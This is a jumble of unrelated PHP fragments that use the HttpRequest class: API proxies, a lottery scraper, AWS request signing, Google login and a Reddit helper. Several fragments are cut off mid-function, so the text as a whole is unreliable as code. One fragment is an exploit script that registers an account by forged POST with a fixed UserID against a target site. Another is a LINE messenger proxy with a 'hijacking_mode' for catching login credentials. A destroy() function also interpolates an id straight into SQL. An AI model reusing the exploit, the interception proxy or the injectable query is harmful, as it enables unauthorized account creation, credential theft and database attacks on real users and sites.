public function ajaxAction()
{
$this->view = new Lupin_View();
$method = strtolower($this->_request->getParam('method'));
$query_uri = trim($this->_request->getParam('query_uri'), '/ ');
$url = $this->_request->getParam('url');
$ssl = $this->_request->getParam('ssl');
$extraParams = $this->_request->getParam('param');
$params = array();
if (!empty($extraParams)) {
foreach ($extraParams as $newParam) {
$parms = explode('=', $newParam, 2);
if (count($parms) > 1) {
list($key, $value) = $parms;
$params[$key] = $value;
}
}
}
$newMethod = HTTP_METH_GET;
switch ($method) {
case 'get':
$newMethod = HTTP_METH_GET;
break;
case 'post':
$newMethod = HTTP_METH_POST;
break;
case 'put':
$newMethod = HTTP_METH_PUT;
break;
case 'delete':
$newMethod = HTTP_METH_DELETE;
break;
case 'head':
$newMethod = HTTP_METH_HEAD;
break;
}
$email = $this->_request->getParam('email');
$pass = $this->_request->getParam('secretKey');
$request_url = 'http' . ($ssl !== null ? 's' : '') . '://' . $url . '/' . $query_uri;
$httpOptions = array();
if ($email && $pass) {
$httpOptions = array('headers' => array('Accept' => '*/*'), 'httpauth' => $email . ':' . $pass, 'httpauthtype' => HTTP_AUTH_DIGEST);
}
$request = new HttpRequest($request_url, $newMethod, $httpOptions);
if ("post" == $method) {
$request->addPostFields($params);
} else {
$request->addQueryData($params);
}
$res = $request->send();
$responseInfo = $request->getResponseInfo();
$response = array('request_url' => $responseInfo['effective_url'], 'response_headers' => $this->collapseHeaders($res->getHeaders()), 'content' => $res->getBody(), 'status' => $res->getResponseCode(), 'method' => strtoupper($method), 'request_post_fields' => http_build_query(!is_null($postFields = $request->getPostFields()) ? $postFields : array()));
$this->view->renderJson($response);
}
/**
* Query past cashpot draws by date.
* @param day a two digit representation of the day eg. 09
* @param month a three letter representation of the month eg. Jan
* @param year a two digit representation of the year eg. 99
* @return the raw html from the page returned by querying a past cashpot draw.
*/
function query_draw_history($day, $month, $year)
{
$url = "http://www.nlcb.co.tt/search/cpq/cashQuery.php";
$fields = array('day' => $day, 'month' => $month, 'year' => $year);
$request = new HttpRequest($url, HttpRequest::METH_POST);
$request->addPostFields($fields);
try {
$request->send();
if ($request->getResponseCode() == 200) {
$response = $request->getResponseBody();
} else {
throw new Exception("Request for {$url} was unsuccessful. A " . $request->getResponseCode() . " response code was returned.");
}
} catch (HttpException $e) {
echo $e->getMessage();
throw $e;
}
return $response;
}
/**
* Remove the specified resource
* @return [type] [description]
*/
function destroy($id)
{
$where = "id = '{$id}'";
if ($this->model->delete($where)) {
$r = new HttpRequest(URL . ':' . USER_CLASS_MICS_PORT . 'delete', HttpRequest::METH_POST);
$r->setOptions(array('cookies' => array('lang' => 'en')));
$r->addPostFields(array('data' => '{"class_id":' . $id . '}'));
try {
echo $r->send()->getBody();
} catch (HttpException $ex) {
echo $ex;
}
}
}
public function ajaxAction()
{
$this->view = new Lupin_View();
$method = strtolower($this->_request->getParam('method'));
$query_uri = trim($this->_request->getParam('query_uri'), '/ ');
$url = $this->_request->getParam('url');
$extraParams = $this->_request->getParam('param');
$params = array('format' => $this->_request->getParam('format'));
if (!empty($extraParams)) {
foreach ($extraParams as $newParam) {
$parms = explode('=', $newParam, 2);
if (count($parms) > 1) {
list($key, $value) = $parms;
$params[$key] = $value;
}
}
}
$newMethod = HTTP_METH_GET;
switch ($method) {
case 'get':
$newMethod = HTTP_METH_GET;
break;
case 'post':
$newMethod = HTTP_METH_POST;
break;
case 'put':
$newMethod = HTTP_METH_PUT;
break;
case 'delete':
$newMethod = HTTP_METH_DELETE;
break;
case 'head':
$newMethod = HTTP_METH_HEAD;
break;
}
$email = $this->_request->getParam('email');
$pass = $this->_request->getParam('secretKey');
$request_url = 'http://' . $url . '/' . $query_uri;
$request = new HttpRequest($request_url, $newMethod);
if ($email && $pass) {
$encoded_auth = base64_encode($email . ':' . $pass);
$request->addHeaders(array('Authorization' => 'Basic ' . $encoded_auth));
}
if ("post" == $method) {
$request->addPostFields($params);
} else {
$request->addQueryData($params);
}
$res = $request->send();
function collapseHeaders($headers)
{
$header_string = "";
foreach ($headers as $name => $value) {
$header_string .= $name . ": " . wordwrap($value, 45, "\n\t") . "\n";
}
return $header_string;
}
$responseInfo = $request->getResponseInfo();
$response = array('request_url' => $responseInfo['effective_url'], 'response_headers' => collapseHeaders($res->getHeaders()), 'content' => $res->getBody(), 'status' => $res->getResponseCode(), 'method' => strtoupper($method), 'request_post_fields' => http_build_query(!is_null($postFields = $request->getPostFields()) ? $postFields : array()));
$this->view->renderJson($response);
}
protected function uploadImage($path)
{
$http_request = new \HttpRequest('http://image.api.abcp.ru/upload/', \HttpRequest::METH_POST);
$http_request->addPostFile('imageFile', $path);
$http_request->addPostFields([]);
$http_request->send();
$body = $http_request->getResponseBody();
$result = json_decode($body);
if ($result->status != '200' || empty($result->response->name)) {
print_r($result);
echo "image api error: {$path}\n";
exit;
}
return $result->response->name;
}
/**
* Signs request with signature version 2
*
* Only POST http method is supported
*
* @param \HttpRequest $request Http request object
* @throws QueryClientException
*/
protected function signRequestV2($request)
{
$time = time();
//Gets the http method name
$httpMethod = self::$httpMethods[$request->getMethod()];
//Gets both host and path from the url
$components = parse_url($request->getUrl());
$common = ['AWSAccessKeyId' => $this->awsAccessKeyId, 'SignatureVersion' => '2', 'SignatureMethod' => 'HmacSHA1', 'Timestamp' => gmdate('Y-m-d\\TH:i:s', $time) . "Z"];
$request->addPostFields($common);
//Gets adjusted options
$options = $request->getPostFields();
//Calculating canonicalized query string
ksort($options);
$canonicalizedQueryString = '';
foreach ($options as $k => $v) {
$canonicalizedQueryString .= '&' . rawurlencode($k) . '=' . rawurlencode($v);
}
$canonicalizedQueryString = ltrim($canonicalizedQueryString, '&');
$stringToSign = $httpMethod . "\n" . strtolower($components['host']) . "\n" . $components['path'] . "\n" . $canonicalizedQueryString;
switch ($common['SignatureMethod']) {
case 'HmacSHA1':
case 'HmacSHA256':
$algo = strtolower(substr($common['SignatureMethod'], 4));
break;
default:
throw new QueryClientException('Unknown SignatureMethod ' . $common['SignatureMethod']);
}
$request->addPostFields(['Signature' => base64_encode(hash_hmac($algo, $stringToSign, $this->secretAccessKey, 1))]);
$request->addHeaders(['X-Amz-Date' => gmdate(\DateTime::ISO8601, $time)]);
}
public function testRemoveUsersCapabilities()
{
$a = array('RequestMethod' => 'RemoveUserCapabilities', 'OwnerID' => 'efb00dbb-d4ab-46dc-aebc-4ba83288c3c0');
$r = new HttpRequest($this->server_url, HttpRequest::METH_POST);
$r->addPostFields($a);
$r->send();
echo $r->getRawRequestMessage();
echo "\n";
echo $r->getRawResponseMessage();
echo "\n";
$this->assertEquals(200, $r->getResponseCode());
}
exit(0);
} else {
$ARG = array();
foreach ($argv as $arg) {
if (strpos($arg, '-') === 0) {
$key = substr($arg, 1, 1);
if (!isset($ARG[$key])) {
$ARG[$key] = substr($arg, 3, strlen($arg));
}
}
}
if ($ARG[u] && $ARG[p] && $ARG[e] && $ARG[s]) {
$post_fields = array('ContentObjectAttribute_data_user_login_30' => $ARG[u], 'ContentObjectAttribute_data_user_password_30' => $ARG[p], 'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p], 'ContentObjectAttribute_data_user_email_30' => $ARG[e], 'UserID' => '14', 'PublishButton' => '1');
$headers = array('User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14', 'Referer' => $ARG[s]);
$res_http = new HttpRequest($ARG[s] . "/user/register", HttpRequest::METH_POST);
$res_http->addPostFields($post_fields);
$res_http->addHeaders($headers);
try {
$response = $res_http->send()->getBody();
if (eregi("success", $response)) {
successfully($ARG[u], $ARG[p]);
} else {
print "[-] Exploit failed";
}
} catch (HttpException $exception) {
print "[-] Not connected";
exit(0);
}
} else {
help_argc($argv[0]);
exit(0);
/** Performs the actual login
* @warning Beware of exceptions.
* @return TRUE on Success, FALSE on Failure.
*/
public function login()
{
try {
//Create a new POST request
$request = new \HttpRequest($this->_loginURL, \HTTP_METH_POST);
//Set the content type
$request->setContentType($this->_contentType);
//Add POST data
$request->addPostFields(array('accountType' => $this->_accountType, 'Email' => $this->_username, 'Passwd' => $this->_password, 'service' => $this->_service, 'source' => $this->_source));
//Should we include Captcha information?
if (!empty($this->_captchaText) && !empty($this->_captchaToken)) {
$request->addPostFields(array('logintoken' => $this->_captchaToken, 'logincaptcha' => $this->_captchaText));
}
// print '------- REQUEST -------------';
// print_r($request);
//
//Make the request
$response = $request->send();
// print '------- RESPONSE ------------';
// print_r($response);
//Success?
if ($response->getResponseCode() == HTTP_RESPONSE_OK) {
//Split the repsonse body into tokens
$tokens = explode("\n", $response->getBody());
//Save each token into the session object
foreach ($tokens as $id_val) {
//Split into token_name=
$token = explode('=', $id_val);
if (empty($token[0])) {
//Skip invalid tokens
continue;
}
//Save the tokens in the session object for future use
$_SESSION[$this->getSessionKey() . '::' . $token[0]] = $token[1];
}
$this->_success = true;
return true;
}
//Captcha?
if ($response->getResponseCode() == HTTP_RESPONSE_FORBIDDEN) {
$captchaURL = '';
$captchaToken = '';
//Split the response body into tokens
$tokens = explode("\n", $response->getBody());
foreach ($tokens as $id_val) {
//This splits the parameters we got from Google into
//ID=Value strings. $token[0]=id, $token[1]=value.
//'2' allows the token to contain '=' chars
$token = explode('=', $id_val, 2);
if ($token[0] == 'CaptchaUrl') {
$captchaURL = CAPTCHA_URL_PREFIX . trim($token[1]);
} elseif ($token[0] == 'CaptchaToken') {
$captchaToken = trim($token[1]);
}
}
//Should we throw a CaptchaException?
if (!empty($captchaToken) && !empty($captchaURL)) {
throw new ClientLoginCaptchaException($captchaURL, $captchaToken);
} else {
throw new ClientLoginException($request->getBody());
}
}
} catch (HttpException $e) {
throw new ClientLoginException("An error has occurred while trying" . " to login: " . $e->getMessage(), $e);
}
//For all other responses, return false
return false;
}
$u = 'http://';
}
$u .= $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
if ($_SERVER['REQUEST_URI'] == '/authct/v1/keys/naver' and $offline_mode == 1) {
$fp = fopen('authct/v1/keys/naver', 'rb');
header("Content-Type: text/json");
header("Content-Length: " . filesize($name));
fpassthru($fp);
exit;
}
if ($_SERVER['REQUEST_URI'] == '/api/v4/TalkService.do') {
}
#$r = new HttpRequest('https://gd2.line.naver.jp/' . $_SERVER['REQUEST_URI'], HttpRequest::METH_POST);
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$r = new HttpRequest($u, HttpRequest::METH_POST);
$r->addPostFields($_POST);
} else {
$r = new HttpRequest($u, HttpRequest::METH_GET);
}
$r->setOptions(array('cookies' => $_COOKIE, 'proxyhost' => 'localhost', 'proxyport' => 8088, 'proxytype' => HTTP_PROXY_HTTP));
$hdr = array();
foreach (getallheaders() as $key => $val) {
$hdr[$key] = $val;
}
unset($hdr['Accept-Encoding']);
$hdr['Content-Type'] = "application/x-thrift";
$r->setHeaders($hdr);
$content = $HTTP_RAW_POST_DATA;
if ($hijacking_mode == 1 and strrpos($content, "loginWithIdentityCredentialForCertificate_disabled")) {
$flag_login = 1;
$debug_file = "line.log";
function reddit_POST($subreddit, $to, $data)
{
global $REDDIT, $modhash, $cookies;
$data['uh'] = $modhash;
$data['api_type'] = 'json';
if ($subreddit) {
$data['r'] = $subreddit;
}
$request = new HttpRequest("{$REDDIT}/{$to}.json", HttpRequest::METH_POST);
$request->addCookies($cookies);
$request->addPostFields($data);
$response = $request->send();
$status = $response->getResponseCode();
if ($status != 200) {
die("/{$to} failed, status={$status}\n");
}
return $response;
}
